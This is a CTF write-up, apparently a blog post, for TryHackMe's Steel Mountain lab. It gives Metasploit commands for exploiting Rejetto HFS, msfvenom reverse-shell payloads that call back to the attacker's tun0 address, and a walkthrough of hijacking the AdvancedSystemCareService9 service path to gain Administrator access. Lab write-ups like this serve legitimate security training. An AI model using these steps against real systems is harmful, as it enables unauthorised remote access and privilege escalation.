Steel Mountain

TryHackMe [Steel Mountain] [Write-Up]

Note: If any process doesn’t work, don’t give up, just try to understand the process and have some patience and try again, Happy Hacking!

Finding open ports and services:

root@prokunal: nmap -A -oN nmap.txt target-ip

There is two websites running on port 80 and another website on port 8080, firstly visiting to port 80 website.

[Task 1] Question #1: we find our “Employee of the month”.

see Picture below:

if you don’t know who is he?🧐 Then watch Mr. Robot Series🤪, (kidding), you can view page source, you will find the answer of first question #1.

[Task 2] Question #1: Moving to our next question, asking for other port running a web server on? we have two ports so, you can try entering both.

[Task 2] Question #2: What file server is running? by going to port 8080, we can see that server information below the left side, by searching it on google, we find that the name of the file server.🥳

[Task 2] Question #3: CVE number to exploit the file server? by searching the file server name with the version we easily find that the exploit and CVE number too.

[Task 2] Question #4: Use Metasploit to get an initial shell. So, let’s go

To exploit with Metasploit, let’s searched the vulnerable server name, and you will find how to exploit with Metasploit.

see Picture below:

let’s go to the Metasploit, we will use:

msf5> use exploit/windows/http/rejetto_hfs_exec
msf5> set rhosts <target ip>
msf5> set rport 8080 // because file server is running on port 8080
msf5> set lhost tun0
msf5> exploit

see, we get a shell as user bill, now search for user flag, for easy first convert meterpreter shell to normal shell aka (CMD), by typing ‘shell’.

Here locating to Desktop folder of the bill, we find our user.txt flag.🥳

[Task 3] Question #1:

as instructed, type “load powershell” in meterpreter after that enter “powershell_shell.

as instructed, upload PowerUp.ps1, we will use Powershell to download the file from our attacking system, just run python server and download it, see picture below.

PS> wget http://tun0 ip:port/PowerUp.ps1 -OutFile PowerUp.Ps1

after downloading the file, follow these steps, make sure you are in the right folder where you downloaded PowerUp.ps1:

PS> . .\PowerUp.ps1
PS> Invoke-AllChecks

after listing all services, look at CanRestart with True value, what ServiceName you find? put it as answer😉

[Task 4] Question #4: let’s find the root flag

Create windows payload with msfvenom as instructed.

root@prokunal> msfvenom -p windows/shell_reverse_tcp lhost=tun0 lport=4443 -f exe -o Advanced.exe

Background the first meterpreter session, follow these steps:

meterpreter> background
msf5 exploit(windows/http/rejetto_hfs_exec)> use exploit/multi/handler
msf5 exploit(multi/handler) > set lhost tun0
msf5 exploit(multi/handler) > set lport 4443
msf5 exploit(multi/handler) > exploit -j
msf5 exploit(multi/handler) > sessions // show the current session number 
msf5 exploit(multi/handler) > sessions -i 3 // previous background session number 

after that, upload the Advanced.exe to “C:\Program Files (x86)\IObit”.

meterpreter > cd C:/
meterpreter > cd "Program Files (x86)"
meterpreter > cd IObit                                                             
meterpreter > upload Advanced.exe

after uploading the exe file to “IObit” folder, type shell in meterpreter, and “stop the AdvancedSystemCareService9”, the copy the Advanced.exe to “Advanced SystemCare” folder, then start the AdvancedSystemCareService9, that’s it, see picture below

here we can see that session 4 opened, after that exit from cmd, and background the meterpreter session, then type sessions, here you can see session 4, to interact with type “sessions -i 4”, that’s it,

after that go to “C:\Users\Administrator\Desktop“, here is your root flag🤭🥳

[Task 5] Moving to our next task, let’s Access and Escalation without Metasploit.

First download the exploit and change the ip address of the script to local tun0 ip, after that, copy the nc.exe from “/usr/share/windows-resources/binaries/nc.exe”, if you have not, then download ith from here, make sure to rename it to nc.exe.

after that, all, start a python server on port 80 and listen on port 443, then after executing the downloaded exploit file, see the picture below for better understanding.

click here to view image in good quality

now, go to “C:\Users\bill\Desktop” path, you will see the user.txt flag.

let’s run the winPEAS script, may it will find some vulnerability, first download it from here, after that download it to the victim machine using wget.

after download, the winPEAS.exe file, execute it in cmd, by typing the winPEAS.exe, and wait, it will list out some misconfiguration, that is “AdvancedSystemCareService9”.

after that, create a windows payload using msfvenom, and download it to “C:\Program Files (x86)\IObit” folder using wget.

root@prokunal: sudo msfvenom -p windows/shell_reverse_tcp lhost=tun0 lport=4455 -f exe -o Advanced.exe

after that, listen to it to port 4455 and stop the AdvancedSystemCareService9 and after that, copy the Advanced.exe to “Advanced SystemCare” folder, and then start the AdvancedSystemCareService9, that’s it, you are in 😉, now go to the “C:\Users\Administrator\Desktop” folder, you will see root.txt

Leave a Reply

Your email address will not be published. Required fields are marked *